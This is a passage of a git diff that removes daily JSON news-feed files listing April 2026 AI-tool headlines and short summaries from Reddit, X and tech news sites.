a chatbot anymore", - "url": "https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "product_launch", - "developer_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T06:08:44.000Z", - "summary": "Anthropic just made Claude Cowork generally available on all paid plans, added 
enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale.\n\nin the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev", - "category": "ai_tools" - }, - { - "title": "@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30", - "url": "https://x.com/ArtificialAnlys/status/2042457674441482736", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-10T05:16:11.374Z", - "summary": "HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance.", - "category": "ai_tools" - }, - { - "title": "Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. Claude Code now remembers everything across sessions", - "url": "https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.78, - "date": "2026-04-09T22:19:44.000Z", - "summary": "If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone.\n\nI built a system that fixes this. 
It's called Memoriki - a template that combines two open source projects:\n\n**Layer 1: LLM Wiki (Karpathy's pattern)**\n\nYou drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w", - "category": "ai_tools" - }, - { - "title": "I no longer need a cloud LLM to do quick web research", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-10T06:51:35.000Z", - "summary": "This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally.\n\nI use Qwen3.5:27B-Q3\\_K\\_M on an RTX 4090 with a context length of \\~200,000. I get \\~40 tk/s and use about 22gb VRAM.\n\nI use it through the llama.cpp Web UI, with MCP tools enabled. 
Here are the tools I have provided it for web search/scrape:\n\n \"\"\"\n webmcp - MC", - "category": "ai_models" - }, - { - "title": "Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT", - "url": "https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-10T06:00:22.605Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale", - "url": "https://x.com/ainativedev/status/2031797311790260394", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T05:16:13.355Z", - "summary": "AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale.", - "category": "ai_tools" - }, - { - "title": "@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For", - "url": "https://x.com/hugobowne/status/2042464629214101663", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T05:16:12.382Z", - "summary": "Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. 
The skills to build monitoring and evaluation infrastructure for AI agents are in high demand.", - "category": "ai_tools" - }, - { - "title": "@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI", - "url": "https://x.com/InfluxDB/status/2042388369674469612", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-10T05:16:10.444Z", - "summary": "InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine.", - "category": "ai_tools" - }, - { - "title": "@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy", - "url": "https://x.com/Techmeme/status/2042465278462955882", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-10T05:16:08.371Z", - "summary": "Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance.", - "category": "ai_tools" - }, - { - "title": "@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare", - "url": "https://x.com/Berci/status/2042464294432858357", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-10T05:16:08.371Z", - "summary": "China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally.", - "category": "ai_tools" - }, - { - "title": "96GB Vram. 
What to run in 2026?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-10T05:07:43.000Z", - "summary": "I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? ", - "category": "ai_models" - }, - { - "title": "making my own ai waifu app that can teach me any language.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-10T03:32:15.000Z", - "summary": "using gemma-4-E4B-it for the llm \nher voice is using omnivoice tts that i made the api using fastapi\n\n3d model made by me using vroid studio \nright now is support uploading image, search web, and using voice call and video call like grok ani.\n\ni'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model.", - "category": "ai_models" - }, - { - "title": "Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T03:16:52.000Z", - "summary": "I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense.\n\n# The core Idea is 
:\n\nInstead of relying on a small model (\\~2B params) to generate code from scratch (which is usually weak), the agent would\n\n1. search GitHub for relevant code\n\n2. use that as a reference\n\n3. copy + adapt existing implementations\n\n4. generate minimal edits instead of full solutions\n\nSo the model acts mo", - "category": "ai_models" - }, - { - "title": "is Agentic Commerce just the next buzzword for let’s automate your bank account?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-10T02:32:35.000Z", - "summary": "Just saw this TechNode article claiming \"AI agents\" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline.\n\nWe can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have \"agents\" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare.\n\nThink about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp", - "category": "ai_models" - }, - { - "title": "Started a video series on building an orchestration layer for LLM post-training [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-10T00:24:33.000Z", - "summary": "Hi everyone!\n\nContext, motivation, a lot of yapping, feel free to skip to TL;DR.\n\nA while back I posted here asking [\\[D\\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). 
Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. \n\nAt first I wasn't trying to build anything new. I mostly wanted to understand veRL p", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-11.json b/data/news-feed-2026-04-11.json deleted file mode 100644 index 371c3b4..0000000 --- a/data/news-feed-2026-04-11.json +++ /dev/null @@ -1,249 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.705Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-11", - "article_count": 15, - "archived_story_count": 346, - "articles": [ - { - "title": "How I made my Claude multimodal — now I just feed it videos", - "url": "https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-11T15:49:48.000Z", - "summary": "Claude + Qwen API\n\nFigured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action.\n\nNow I just drop a video straight into Claude and get back what I need.\n\nPackaged it as a plugin for easy setup.\n\ngithub.com/kirillbrsnkv/give-claude-eyes", - "category": "ai_tools" - }, - { - "title": "How to get Claude to run more autonomously", - "url": "https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-04-11T11:38:26.000Z", - "summary": "Hi! 
Can someone tell me how to get Claude to work more autonomously on a large task?\n\nA bit of context: \nI have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings.\n\nThe application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. Also a lot of properties are nullable, but not explicitly. 3k warnings currently.\n\nSuper tedious for a human ", - "category": "ai_tools" - }, - { - "title": "update on my ai waifu app, can use web search react to images even picture of herself", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-11T11:19:52.000Z", - "summary": "using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances)\n\nusing SerpApi for the web search\n\nthe tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api)\n\nmy ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag", - "category": "ai_models" - }, - { - "title": "I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki", - "url": "https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-11T08:42:01.000Z", - "summary": "If you run multiple agent 
CLIs daily, you've probably hit the same pain points I have:\n\n1. Too many terminal windows — impossible to find the one you need\n2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse\n3. Sharing files between agents means manually copying everything into the project folder\n\nI looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b", - "category": "ai_tools" - }, - { - "title": "I automated most of my job", - "url": "https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-10T14:03:08.000Z", - "summary": "I'm a software engineer with 11 yoe. I automated about 80% of my job with claude cli and a super simple dotnet console app.\n\nThe workflow is super simple:\n\n1. dotnet app calls our gitlab api for issues assigned to me\n\n2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description\n\n3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a", - "category": "ai_tools" - }, - { - "title": "I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it", - "url": "https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-04-11T08:37:14.000Z", - "summary": "Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. 
I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago.\n\nSo I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project.\n\nWhat it does fo", - "category": "ai_tools" - }, - { - "title": "I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out", - "url": "https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.96, - "date": "2026-04-11T09:58:19.000Z", - "summary": " \nBuilt with Claude Code, specifically for Claude Code users. Free, open source, MIT. \n \nWhat it does \n \nu/daik0z/claude-notify adds a Stop hook to \\~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: \"3 files edited · 2 commands \n\". \n \nnpm install -g u/daik0z/claude-notify \nclaude-notify setup \n \nWhat I learned from 374 downloads \n \nI sat down to stress-test it and foun", - "category": "ai_tools" - }, - { - "title": "ComfyUI workflow to fully python script?", - "url": "https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-11T23:25:36.000Z", - "summary": "Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python.\n\nWhy?\nI'm planning to use a multi-GPU server and I want to optimize for that.\n\nWhat libraries should I use? 
Is Diffusers the go-to or is there something better? Any tips from people who've done this?\n\nAlso, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those?\n\nThank you!", - "category": "creative_tools" - }, - { - "title": "Labs for Claude Certified Architect Foundations Exam", - "url": "https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-11T17:28:37.000Z", - "summary": "While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers.\n\n* Lab 01 - Customer Support Resolution Agent\n* Lab 02 - Code Generation Workflows\n* Lab 03 - Multi-Agent Research System\n* Lab 04 - Developer Productivity Agent\n* Lab 05 - CI/CD Integration\n* Lab 06 - Structured Data Extraction\n\n[https://github.", - "category": "ai_tools" - }, - { - "title": "FT - China’s Alibaba shifts towards revenue over open-source AI", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-11T17:23:20.000Z", - "summary": "[https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t)\n\n \nIs it true?", - "category": "ai_models" - }, - { - "title": "FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/", - "source": "Reddit 
r/MachineLearning", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-11T15:33:13.000Z", - "summary": "I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch.\n\nThe main goal is to make the progression across versions easier to understand from code.\n\nThis is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details.\n", - "category": "ai_research" - }, - { - "title": "I built a structured reasoning framework for Claude — because \"good output\" isn't enough", - "url": "https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-11T14:46:51.000Z", - "summary": "**I built a structured reasoning framework for Claude — because \"good output\" isn't enough**\n\nI kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up.\n\nSo I built CRC — Complex Reasoning Compiler. 
It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled.\n\nThe core idea:\n\n* Every complex task goes through a f", - "category": "ai_tools" - }, - { - "title": "Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-11T13:06:26.000Z", - "summary": "Posted here yesterday about the v1 cross-modal dataset. One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples.\n\nHuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal\nGitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/\nMIT licensed.\n\nThe repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and", - "category": "ai_models" - }, - { - "title": "Gemma 4 - Going Mad - - - Help!!!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-11T12:52:14.000Z", - "summary": "Hi All\n\nIm getting up to speed on LLMs and we are looking at Gemma4. \nWe are using a M3 Ultra with 512GB VRAM. So no dangers there.\n\nIm using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling.\n\nI have re-downloaded all the models this morning post the fixes. These are the unsloth ones. 
\n\nIm running llama.cpp - which i build on the server and is bang up to date.\n\nSo in opencode CLI - if i give it this prompt - its runs", - "category": "ai_models" - }, - { - "title": "Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-11T11:22:38.000Z", - "summary": "I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff.\n\nTried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists.\n\nIt includes:\n\n• local models (Ollama, Qwen, Llama etc) \n• free LLM APIs (OpenRouter, Groq, Gemini etc) \n• coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) \n• RAG stack tools (vector DBs, embeddings, frameworks) \n• agent frameworks and automati", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-12.json b/data/news-feed-2026-04-12.json deleted file mode 100644 index e265916..0000000 --- a/data/news-feed-2026-04-12.json +++ /dev/null @@ -1,168 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.848Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-12", - "article_count": 10, - "archived_story_count": 109, - "articles": [ - { - "title": "JARVIS running on 3 servers as one fleet. 
Claude Code, Cursor, and OpenCode all coordinating.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-12T04:34:19.000Z", - "summary": "One instance is enough, but where is the fun in that right? 🤣\n\nJARVIS across 3 servers, each running a different AI coding agent:\n\n\\- Hel2: Claude Code CLI\n\n\\- Hel1: Cursor CLI\n\n\\- Mainframe: OpenCode \n\nThey talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. \n\nSame JARVIS, different hands. They don't just run. They coordinate.\n\nVideo is all 3 tmux sessions open at o", - "category": "ai_tools" - }, - { - "title": "Openclaw real costs: self hosting vs managed hosting vs API fees", - "url": "https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-12T06:27:27.000Z", - "summary": "Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. 
How much are people paying for self-hosting vs managed and is the price difference worth?", - "category": "ai_tools" - }, - { - "title": "OK I installed bitsandbytes but still getting error - Help please - thanks", - "url": "https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-12T01:55:27.000Z", - "summary": "Used terminal and installed it like so:\n\npip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\\_main/bitsandbytes-1.33.7.preview-py3-none-win\\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl)\n\n \nGetting error and StableDiffusion does not run\n\nFile \"C:\\\\Users\\\\123\\\\Downloads\\\\StabilityMatrix-win-x64\\\\Data\\\\Packages\\\\", - "category": "creative_tools" - }, - { - "title": "Meta released new paper : Neural Computers", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-12T06:54:27.000Z", - "summary": "What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. 
check more details : https://youtu.be/Evcgg-LG\\_jA?si=0h0bnM7qUsqDcKCJ\n\npaper : https://arxiv.org/abs/2604.06425", - "category": "ai_models" - }, - { - "title": "Open source agent stack that actually works in 2026 (no hype)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-12T06:16:49.000Z", - "summary": "been running this setup for a few months and wanted to share what actually works vs whats just github stars\n\nhermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. your agent on day 30 actually knows your projects and preferences\n\neverything c", - "category": "ai_models" - }, - { - "title": "MiniMax M2.7 is NOT open source - DOA License :(", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-12T02:55:38.000Z", - "summary": "Commercial use is banned without prior written permission from MiniMax.\n\nAnd their definition of \"commercial\" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. 
Military use is also explicitly prohibited- interesting.\n\nSo you can't use the model or any outputs for anything commercial!\n\nI'm really starting to hate these \"open weights, closed license\" models...\n\nhttps://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE", - "category": "ai_models" - }, - { - "title": "Does LTX 2.3 have good motion transfer?", - "url": "https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.9400000000000001, - "date": "2026-04-12T07:50:22.000Z", - "summary": "What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one?\n\n", - "category": "creative_tools" - }, - { - "title": "This is so good", - "url": "https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.86, - "date": "2026-04-12T03:35:24.000Z", - "summary": "Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. 
", - "category": "ai_tools" - }, - { - "title": "It seems ChatGPT leaked a JSON response (including API enpoint)", - "url": "https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.86, - "date": "2026-04-11T23:52:55.000Z", - "summary": "idk if this is visible in network requests, but chatgpt responded with \\[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\\\n \"error\": {\\\\n \"message\": \"You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.\",\\\\n \"type\": \"images\",\\\\n \"param\": nul", - "category": "ai_tools" - }, - { - "title": "MiniMax M2.7 Is Now Open Source", - "url": "https://firethering.com/minimax-m2-7-agentic-model/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.74, - "date": "2026-04-12T10:07:33.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-14.json b/data/news-feed-2026-04-14.json deleted file mode 100644 index 363235b..0000000 --- a/data/news-feed-2026-04-14.json +++ /dev/null @@ -1,255 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.094Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-14", - "article_count": 15, - "archived_story_count": 271, - "articles": [ - { - "title": "hands on workshop: context engineering for multi agent systems [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "mcp", - 
